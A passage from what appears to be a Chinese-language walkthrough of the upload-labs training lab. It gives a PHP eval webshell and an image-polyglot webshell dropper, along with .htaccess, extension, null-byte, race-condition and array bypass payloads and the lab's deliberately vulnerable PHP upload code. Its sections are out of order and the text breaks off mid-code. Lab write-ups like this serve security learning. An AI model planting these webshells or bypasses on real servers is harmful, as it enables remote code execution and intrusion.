<p>可以看到，这里img_path可控（通过post sava_name），所以可以利用move_uploaded_file的\x00截断(save_name=ma.php%00.jpg)绕过,但\x00截断之前关卡已经出现过了，这里明显是考察别的知识点。于是网上找找别人的答案，发现考点是:move_uploaded_file会忽略掉文件末尾的/.所以可以构造save_path=ma.php/.,这样file_ext值就为空，就能绕过黑名单，而move_uploaded_file函数忽略文件末尾的/.可以实现保存文件为.php</p>
<p><strong>绕过</strong></p>
<p>burp抓包末尾添加：<code>save_name=ma.php/.</code>，注意马的名字与filename一致</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215173229186.png" srcset="/img/loading.gif" alt="image-20210215173229186"></p>
<p>当然也可以传个图片马子</p>
<p>也可以直接在上传处保存文件名哪里后面加<code>/</code>或者<code>.</code>都可</p>
<h3 id="Pass-20：数组-绕过"><a href="#Pass-20：数组-绕过" class="headerlink" title="Pass-20：数组/.绕过"></a>Pass-20：数组/.绕过</h3><p>后台代码</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>($_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>]))&#123;
    <span class="hljs-comment">//检查MIME</span>
    $allow_type = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;image/jpeg&#x27;</span>,<span class="hljs-string">&#x27;image/png&#x27;</span>,<span class="hljs-string">&#x27;image/gif&#x27;</span>);
    <span class="hljs-keyword">if</span>(!in_array($_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;type&#x27;</span>],$allow_type))&#123;
        $msg = <span class="hljs-string">&quot;禁止上传该类型文件!&quot;</span>;
    &#125;<span class="hljs-keyword">else</span>&#123;
        <span class="hljs-comment">//检查文件名</span>
        $file = <span class="hljs-keyword">empty</span>($_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>]) ? $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>] : $_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>];
        <span class="hljs-keyword">if</span> (!is_array($file)) &#123;
            $file = explode(<span class="hljs-string">&#x27;.&#x27;</span>, strtolower($file));
        &#125;

        $ext = end($file);
        $allow_suffix = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);
        <span class="hljs-keyword">if</span> (!in_array($ext, $allow_suffix)) &#123;
            $msg = <span class="hljs-string">&quot;禁止上传该后缀文件!&quot;</span>;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $file_name = reset($file) . <span class="hljs-string">&#x27;.&#x27;</span> . $file[count($file) - <span class="hljs-number">1</span>];
            $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
            $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> .$file_name;
            <span class="hljs-keyword">if</span> (move_uploaded_file($temp_file, $img_path)) &#123;
                $msg = <span class="hljs-string">&quot;文件上传成功！&quot;</span>;
                $is_upload = <span class="hljs-literal">true</span>;
            &#125; <span class="hljs-keyword">else</span> &#123;
                $msg = <span class="hljs-string">&quot;文件上传失败！&quot;</span>;
            &#125;
        &#125;
    &#125;
&#125;<span class="hljs-keyword">else</span>&#123;
    $msg = <span class="hljs-string">&quot;请选择要上传的文件！&quot;</span>;
&#125;</code></pre>

<p>可以发现<code>$file_name</code>经过<code>reset($file) . &#39;.&#39; . $file[count($file) - 1];</code>处理。</p>
<p>如果上传的是数组的话，会跳过<code>$file = explode(&#39;.&#39;, strtolower($file));</code>。并且后缀有白名单过滤</p>
<pre><code class="hljs xquery"><span class="hljs-variable">$ext</span> = <span class="hljs-keyword">end</span>(<span class="hljs-variable">$file</span>);
<span class="hljs-variable">$allow_suffix</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);</code></pre>

<p>而最终的文件名后缀取的是<code>$file[count($file) - 1]</code>，因此我们可以让<code>$file</code>为数组。<code>$file[0]</code>为<code>smi1e.php/</code>，也就是<code>reset($file)</code>，然后再令<code>$file[2]</code>为白名单中的jpg。此时<code>end($file)</code>等于jpg，<code>$file[count($file) - 1]</code>为空。而 <code>$file_name = reset($file) . &#39;.&#39; . $file[count($file) - 1];</code>，也就是<code>smi1e.php/.</code>，最终<code>move_uploaded_file</code>会忽略掉<code>/.</code>，最终上传<code>smi1e.php</code>。</p>
<p><strong>绕过</strong></p>
<p>burp抓包修改为数组，如下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215181210201.png" srcset="/img/loading.gif" alt="image-20210215181210201"></p>
<p>本文是upload-labs通关记录。</p>
<!-- more -->



<h3 id="前期准备-1"><a href="#前期准备-1" class="headerlink" title="前期准备"></a>前期准备</h3><p>制作一个一句话木马：<code>&lt;?php @eval($_POST[1]);?&gt;</code></p>
<p>制作一个图片马：<code>copy 1.jpg/b +ma.php/a ma.jpg</code></p>
<p>图片马内容：<code>&lt;?php  fputs(fopen(&#39;xx.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[1]);?&gt;&#39;); ?&gt;</code></p>
<h3 id="Pass-01：前端js验证-1"><a href="#Pass-01：前端js验证-1" class="headerlink" title="Pass-01：前端js验证"></a>Pass-01：前端js验证</h3><p>随意选个马子传一下，结果秒显不允许</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215110356885.png" srcset="/img/loading.gif" alt="image-20210215110356885"></p>
<p>猜测前端js检查了，验证前端代码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215110544819.png" srcset="/img/loading.gif" alt="image-20210215110544819"></p>
<p><strong>绕过</strong></p>
<p>关了浏览器的前端js验证。</p>
<p>当然你要是嫌关js麻烦，你传个图片马就o了</p>
<p>上传图片马，然后文件包含</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215154901813.png" srcset="/img/loading.gif" alt="image-20210215154901813"></p>
<p>菜刀连接</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215154959908.png" srcset="/img/loading.gif" alt="image-20210215154959908"></p>
<h3 id="Pass-02：MIME-1"><a href="#Pass-02：MIME-1" class="headerlink" title="Pass-02：MIME"></a>Pass-02：MIME</h3><p>老规矩，搞个马子传一下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215122215429.png" srcset="/img/loading.gif" alt="image-20210215122215429"></p>
<p>看一下后台源代码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215122237531.png" srcset="/img/loading.gif" alt="image-20210215122237531"></p>
<p><strong>绕过</strong>验证MIME类型的，抓包改一下MIME为image/jpeg就o了</p>
<p>嫌抓包麻烦，直接传个图片马也可以。</p>
<h3 id="Pass-03：宽松的黑名单-1"><a href="#Pass-03：宽松的黑名单-1" class="headerlink" title="Pass-03：宽松的黑名单"></a>Pass-03：宽松的黑名单</h3><p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215124206217.png" srcset="/img/loading.gif" alt="image-20210215124206217"></p>
<p>一看黑名单验证，查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215124326909.png" srcset="/img/loading.gif" alt="image-20210215124326909"></p>
<p>果然。</p>
<p><strong>绕过</strong></p>
<p>这个黑名单限制不是很全，找一个没有在限制里面的后缀就可以绕过，比如php3，但是当上传的这些文件要被当作php来执行，需要有以下条件：即Apache的httpd.conf有如下配置代码</p>
<pre><code class="hljs jboss-cli">AddType application/x-httpd-php <span class="hljs-string">.php</span> <span class="hljs-string">.phtml</span> <span class="hljs-string">.phps</span> <span class="hljs-string">.php5</span> <span class="hljs-string">.pht</span> <span class="hljs-string">.ph3</span>
<span class="hljs-comment">#配置里面有你所上传的后缀</span></code></pre>

<p>此处黑名单没有过滤.htaccess后缀，故此处也可上传.htaccess文件进行绕过。</p>
<p>或者传个图片马</p>
<h3 id="Pass-04-htaccsess-1"><a href="#Pass-04-htaccsess-1" class="headerlink" title="Pass-04:.htaccsess"></a>Pass-04:.htaccsess</h3><p>找个马子试一下</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215125826838.png" srcset="/img/loading.gif" alt="image-20210215125826838"></p>
<p>看了下后台，比较长，不好列举，就以提示给的tips列举</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215125736761.png" srcset="/img/loading.gif" alt="image-20210215125736761"></p>
<p><strong>绕过</strong></p>
<p>可以看到没有限制.htaccsess文件，故可以上传.htaccsess文件绕过。内容如下</p>
<pre><code class="hljs apache"><span class="hljs-attribute"><span class="hljs-nomarkup">SetHandler</span></span> application/x-httpd-php</code></pre>

<p>这样所有文件都会解析为php，然后再上传图片马，就可以解析为php</p>
<h3 id="Pass-05：后缀大小写-1"><a href="#Pass-05：后缀大小写-1" class="headerlink" title="Pass-05：后缀大小写"></a>Pass-05：后缀大小写</h3><p>查看后台，这回完犊子了，加了.htaccess</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215133655371.png" srcset="/img/loading.gif" alt="image-20210215133655371"></p>
<p>仔细看后台源代码，并没有转换大小写</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215134635811.png" srcset="/img/loading.gif" alt="image-20210215134635811"></p>
<p><strong>绕过</strong></p>
<p>更改马子的后缀大小写，例如：<code>ma.Php</code></p>
<h3 id="Pass-06-空格绕过-1"><a href="#Pass-06-空格绕过-1" class="headerlink" title="Pass-06:空格绕过"></a>Pass-06:空格绕过</h3><p>仔细看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215135013175.png" srcset="/img/loading.gif" alt="image-20210215135013175"></p>
<p>相比于上面Pass-05代码，这里将文件后缀名统一进行了小写转换，但是没有去除文件名首尾的空格。所以此处可以利用windows系统的命名规则进行绕过。</p>
<p><strong>绕过</strong></p>
<p>抓包在filename后面加个空格</p>
<h3 id="Pass-07：点绕过-1"><a href="#Pass-07：点绕过-1" class="headerlink" title="Pass-07：点绕过"></a>Pass-07：点绕过</h3><p>仔细看后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140041505.png" srcset="/img/loading.gif" alt="image-20210215140041505"></p>
<p>可以发现相比于Pass-06代码，加上了首尾去空，但是却少了尾部去点。故和上面Pass-06一样，利用windows文件命名规则绕过。</p>
<p><strong>绕过</strong></p>
<p>抓包在filename后面加个“.”</p>
<h3 id="Pass-08-：-DATE-1"><a href="#Pass-08-：-DATE-1" class="headerlink" title="Pass-08 ：::$DATE"></a>Pass-08 ：::$DATE</h3><p>后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140137448.png" srcset="/img/loading.gif" alt="image-20210215140137448"></p>
<p>可以看到，与前面第七关的代码相比，少了去除文件名的”::$DATA”字符串这一步。这里还是利用windows的一个特性。</p>
<blockquote>
<p>NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能，主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中，此默认数据流称为：$ DATA。</p>
</blockquote>
<p>简单讲就是在php+windows的情况下：如果文件名+<code>&quot;::$DATA&quot;</code>会把<code>::$DATA</code>之后的数据当成文件流处理，不会检测后缀名.且保持<code>&quot;::$DATA&quot;</code>之前的文件名。</p>
<p><em>注:仅windows适用</em></p>
<p><strong>绕过</strong></p>
<p>用burp将上传文件后缀改为:<code>xx.php::$DATA</code>即可</p>
<h3 id="Pass-09：点空格点-1"><a href="#Pass-09：点空格点-1" class="headerlink" title="Pass-09：点空格点"></a>Pass-09：点空格点</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215140532614.png" srcset="/img/loading.gif" alt="image-20210215140532614"></p>
<p>可以看到，这里代码的安全性比之前的都要更高，黑名单类型全，大小写经过转换，去除了文件名末尾的点，去除了文件名尾空格，还去除了::$DATA。。但是，这里还是可以绕过的。这里的代码逻辑是先删除文件名末尾的点，再进行首尾去空。都只进行一次。</p>
<p><strong>绕过</strong></p>
<p>抓包构造点空格点进行绕过，也就是后缀名改为<code>xx.php. .</code></p>
<h3 id="Pass-10：双写绕过-1"><a href="#Pass-10：双写绕过-1" class="headerlink" title="Pass-10：双写绕过"></a>Pass-10：双写绕过</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215141032311.png" srcset="/img/loading.gif" alt="image-20210215141032311"></p>
<p>分析注意：<strong>str_ireplace</strong>函数<strong>不区分大小写</strong>的替换字符串中的一些字符，此次源码将黑名单里的文件后缀名替换成空字符。</p>
<p><strong>绕过</strong></p>
<p>用burp修改后缀名为 <code>.pphphp</code></p>
<h3 id="Pass-11：00截断-1"><a href="#Pass-11：00截断-1" class="headerlink" title="Pass-11：00截断"></a>Pass-11：00截断</h3><p>查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215141813823.png" srcset="/img/loading.gif" alt="image-20210215141813823"></p>
<p>这里与之前代码相比，使用了白名单，只允许上传，jpg，png，gif三种格式文件。但是在进行move_uploaded_file前。利用<code>GET[&#39;save_path&#39;]</code>和随机时间函数进行拼接，拼接成文件存储路径。这里构造文件存储路径利用了_GET传入，导致服务器最终存储的文件名可控。故可以利用这个点进行绕过。</p>
<p><strong>绕过</strong></p>
<p>00截断。即move_uploaded_file函数的底层实现类似于C语言，遇到0x00会截断</p>
<blockquote>
<p>截断条件：<br>1、php版本小于5.3.4<br>2、php.ini的magic_quotes_gpc为OFF状态</p>
</blockquote>
<p>抓包进行修改</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215142538909.png" srcset="/img/loading.gif" alt="image-20210215142538909"></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215142754495.png" srcset="/img/loading.gif" alt="image-20210215142754495"></p>
<h3 id="Pass-12：-00-1"><a href="#Pass-12：-00-1" class="headerlink" title="Pass-12：%00"></a>Pass-12：%00</h3><p>后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215143512734.png" srcset="/img/loading.gif" alt="image-20210215143512734"></p>
<p>这里代码与上面Pass-11代码类似，不过是save_path参数由GET传入变为POST传入，还是利用00截断，但这次需要在二进制中进行修改，因为post不会像get对%00进行自动解码。</p>
<p><strong>绕过</strong></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215145042313.png" srcset="/img/loading.gif" alt="image-20210215145042313"></p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215145151607.png" srcset="/img/loading.gif" alt="image-20210215145151607"></p>
<h3 id="Pass-13：文件头检测-1"><a href="#Pass-13：文件头检测-1" class="headerlink" title="Pass-13：文件头检测"></a>Pass-13：文件头检测</h3><p>这一关开始上传图片马，后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215161722242.png" srcset="/img/loading.gif" alt="image-20210215161722242"></p>
<p>使用了 getReailFileType函数</p>
<p><strong>绕过</strong></p>
<p>burp抓包添加一个图片文件的文件幻数</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215161612151.png" srcset="/img/loading.gif" alt="image-20210215161612151"></p>
<p>或者直接上传一张图片马即可。</p>
<h3 id="Pass-14：getimagesize-1"><a href="#Pass-14：getimagesize-1" class="headerlink" title="Pass-14：getimagesize"></a>Pass-14：getimagesize</h3><p>查看后台源码</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215151630875.png" srcset="/img/loading.gif" alt="image-20210215151630875"></p>
<p>使用了getimagesize函数来验证，加对应图片的文件头就o了</p>
<p>比如：gif-GIF89a</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215153117383.png" srcset="/img/loading.gif" alt="image-20210215153117383"></p>
<p>或者传一个图片马子</p>
<h3 id="Pass-15：exif-imagetype-1"><a href="#Pass-15：exif-imagetype-1" class="headerlink" title="Pass-15：exif_imagetype()"></a>Pass-15：exif_imagetype()</h3><p>后台</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215153456115.png" srcset="/img/loading.gif" alt="image-20210215153456115"></p>
<p><strong>绕过</strong></p>
<p>同13、14一样</p>
<h3 id="Pass-16：二次渲染-1"><a href="#Pass-16：二次渲染-1" class="headerlink" title="Pass-16：二次渲染"></a>Pass-16：二次渲染</h3><p>后台</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>]))&#123;
    <span class="hljs-comment">// 获得上传文件的基本信息，文件名，类型，大小，临时文件路径</span>
    $filename = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];
    $filetype = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;type&#x27;</span>];
    $tmpname = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];

    $target_path=UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.basename($filename);

    <span class="hljs-comment">// 获得上传文件的扩展名</span>
    $fileext= substr(strrchr($filename,<span class="hljs-string">&quot;.&quot;</span>),<span class="hljs-number">1</span>);

    <span class="hljs-comment">//判断文件后缀与类型，合法才进行上传操作</span>
    <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;jpg&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/jpeg&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefromjpeg($target_path);

            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是jpg格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.jpg&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;

    &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;png&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/png&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefrompng($target_path);

            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是png格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                 <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.png&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;               
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;

    &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(($fileext == <span class="hljs-string">&quot;gif&quot;</span>) &amp;&amp; ($filetype==<span class="hljs-string">&quot;image/gif&quot;</span>))&#123;
        <span class="hljs-keyword">if</span>(move_uploaded_file($tmpname,$target_path))&#123;
            <span class="hljs-comment">//使用上传的图片生成新的图片</span>
            $im = imagecreatefromgif($target_path);
            <span class="hljs-keyword">if</span>($im == <span class="hljs-literal">false</span>)&#123;
                $msg = <span class="hljs-string">&quot;该文件不是gif格式的图片！&quot;</span>;
                @unlink($target_path);
            &#125;<span class="hljs-keyword">else</span>&#123;
                <span class="hljs-comment">//给新图片指定文件名</span>
                srand(time());
                $newfilename = strval(rand()).<span class="hljs-string">&quot;.gif&quot;</span>;
                <span class="hljs-comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span>
                $img_path = UPLOAD_PATH.<span class="hljs-string">&#x27;/&#x27;</span>.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = <span class="hljs-literal">true</span>;
            &#125;
        &#125; <span class="hljs-keyword">else</span> &#123;
            $msg = <span class="hljs-string">&quot;上传出错！&quot;</span>;
        &#125;
    &#125;<span class="hljs-keyword">else</span>&#123;
        $msg = <span class="hljs-string">&quot;只允许上传后缀为.jpg|.png|.gif的图片文件！&quot;</span>;
    &#125;
&#125;</code></pre>

<p>可以看到，这里先是判断Content-Type，然后再用imagecreatefrom[gif|png|jpg]函数判断是否是图片格式，如果是图片的话再用image[gif|png|jpg]函数对其进行二次渲染。</p>
<p>这里就不再对比上传图片马前后的区别，直接结论：图片马的恶意内容被磨除了。</p>
<p><strong>绕过</strong></p>
<p>如果想要绕过二次渲染的话，就要搞清楚二次渲染后，源文件哪些区域不会被修改或压缩。这里因为gif、jpg、png三种不同图片文件的文件格式不同，所以图片马的构造方法也不同，具体可以参考我的上一篇文章中有总结：“文件上传”</p>
<h3 id="Pass-17：条件竞争时间差-1"><a href="#Pass-17：条件竞争时间差-1" class="headerlink" title="Pass-17：条件竞争时间差"></a>Pass-17：条件竞争时间差</h3><p>后台</p>
<pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>]))&#123;
    $ext_arr = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;jpg&#x27;</span>,<span class="hljs-string">&#x27;png&#x27;</span>,<span class="hljs-string">&#x27;gif&#x27;</span>);
    $file_name = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];
    $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
    $file_ext = substr($file_name,strrpos($file_name,<span class="hljs-string">&quot;.&quot;</span>)+<span class="hljs-number">1</span>);
    $upload_file = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> . $file_name;

    <span class="hljs-keyword">if</span>(move_uploaded_file($temp_file, $upload_file))&#123;
        <span class="hljs-keyword">if</span>(in_array($file_ext,$ext_arr))&#123;
             $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span>. rand(<span class="hljs-number">10</span>, <span class="hljs-number">99</span>).date(<span class="hljs-string">&quot;YmdHis&quot;</span>).<span class="hljs-string">&quot;.&quot;</span>.$file_ext;
             rename($upload_file, $img_path);
             $is_upload = <span class="hljs-literal">true</span>;
        &#125;<span class="hljs-keyword">else</span>&#123;
            $msg = <span class="hljs-string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;
            unlink($upload_file);
        &#125;
    &#125;<span class="hljs-keyword">else</span>&#123;
        $msg = <span class="hljs-string">&#x27;上传出错！&#x27;</span>;
    &#125;
&#125;</code></pre>

<p>不难发现，这里是先move_uploaded_file函数将上传文件临时保存，再进行判断，如果不在白名单里则unlink删除，在的话就rename重命名，所以这里存在条件竞争。</p>
<p><strong>绕过</strong></p>
<p>用burp开启两个intruder模块，一个用于重复上传，另一个用于重复访问。</p>
<p>1、先设置上传请求,记住此处的文件名，等下要用来拼接访问请求的url</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215163251176.png" srcset="/img/loading.gif" alt="image-20210215163251176"></p>
<p>2、因为此处没有什么参数需要爆破，只是需要重复发起请求，所以payload设置为Null payloads,设置访问次数5000次，线程50个</p>
<p><img src="/2020/06/01/upload-labs%E9%80%9A%E5%85%B3%E8%AE%B0%E5%BD%95/image-20210215164100568.png" srcset="/img/loading.gif" alt="image-20210215164100568"></p>
<p>3、接下来设置访问请求<br>1、浏览器构造请求url：<code>http://127.0.0.1/upload-labs/upload/ma.Php</code>,进行访问，然后用burp抓包<br>2、burp抓包后发送至intruder模块，然后设置payload，这一步和上传请求设置差不多,都是Null payloads、5000次、50个线程</p>
<p>3、设置好两个模块后同时启动，观察结果，因为我们传入的php代码是<code>phpinfo();</code>,所以如果访问成功的话，会返回php的配置信息。</p>
<p>注意：条件竞争绕过存在一定概率，实践中如果一次不成功，可以多试几次。</p>
<p>另外一种方法，在上一篇文章中也讲过</p>
<p>也可以上传图片马</p>
<h3 id="Pass-18：突破上传重命名-1"><a href="#Pass-18：突破上传重命名-1" class="headerlink" title="Pass-18：突破上传重命名"></a>Pass-18：突破上传重命名</h3><p>这里先将上传的文件保存（move函数），再rename重命名一下。所以也存在条件竞争，绕过方法和上面Pass-17差不多，这里就不重复写了。这里先将上传的文件保存（move函数），再rename重命名一下。所以也存在条件竞争，绕过方法和上面Pass-17差不多，这里就不重复写了。</p>
<h3 id="Pass-19：-绕过-1"><a href="#Pass-19：-绕过-1" class="headerlink" title="Pass-19：./绕过"></a>Pass-19：./绕过</h3><p>后台</p>
<pre><code class="hljs php">$is_upload = <span class="hljs-literal">false</span>;
$msg = <span class="hljs-literal">null</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;submit&#x27;</span>])) &#123;
    <span class="hljs-keyword">if</span> (file_exists(UPLOAD_PATH)) &#123;
        $deny_ext = <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;php&quot;</span>,<span class="hljs-string">&quot;php5&quot;</span>,<span class="hljs-string">&quot;php4&quot;</span>,<span class="hljs-string">&quot;php3&quot;</span>,<span class="hljs-string">&quot;php2&quot;</span>,<span class="hljs-string">&quot;html&quot;</span>,<span class="hljs-string">&quot;htm&quot;</span>,<span class="hljs-string">&quot;phtml&quot;</span>,<span class="hljs-string">&quot;pht&quot;</span>,<span class="hljs-string">&quot;jsp&quot;</span>,<span class="hljs-string">&quot;jspa&quot;</span>,<span class="hljs-string">&quot;jspx&quot;</span>,<span class="hljs-string">&quot;jsw&quot;</span>,<span class="hljs-string">&quot;jsv&quot;</span>,<span class="hljs-string">&quot;jspf&quot;</span>,<span class="hljs-string">&quot;jtml&quot;</span>,<span class="hljs-string">&quot;asp&quot;</span>,<span class="hljs-string">&quot;aspx&quot;</span>,<span class="hljs-string">&quot;asa&quot;</span>,<span class="hljs-string">&quot;asax&quot;</span>,<span class="hljs-string">&quot;ascx&quot;</span>,<span class="hljs-string">&quot;ashx&quot;</span>,<span class="hljs-string">&quot;asmx&quot;</span>,<span class="hljs-string">&quot;cer&quot;</span>,<span class="hljs-string">&quot;swf&quot;</span>,<span class="hljs-string">&quot;htaccess&quot;</span>);

        $file_name = $_POST[<span class="hljs-string">&#x27;save_name&#x27;</span>];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        <span class="hljs-keyword">if</span>(!in_array($file_ext,$deny_ext)) &#123;
            $temp_file = $_FILES[<span class="hljs-string">&#x27;upload_file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>];
            $img_path = UPLOAD_PATH . <span class="hljs-string">&#x27;/&#x27;</span> .$file_name;
            <span class="hljs-keyword">if</span> (move_uploaded_file($temp_file, $img_path)) &#123; 
                $is_upload = <span class="hljs-literal">true</span>;
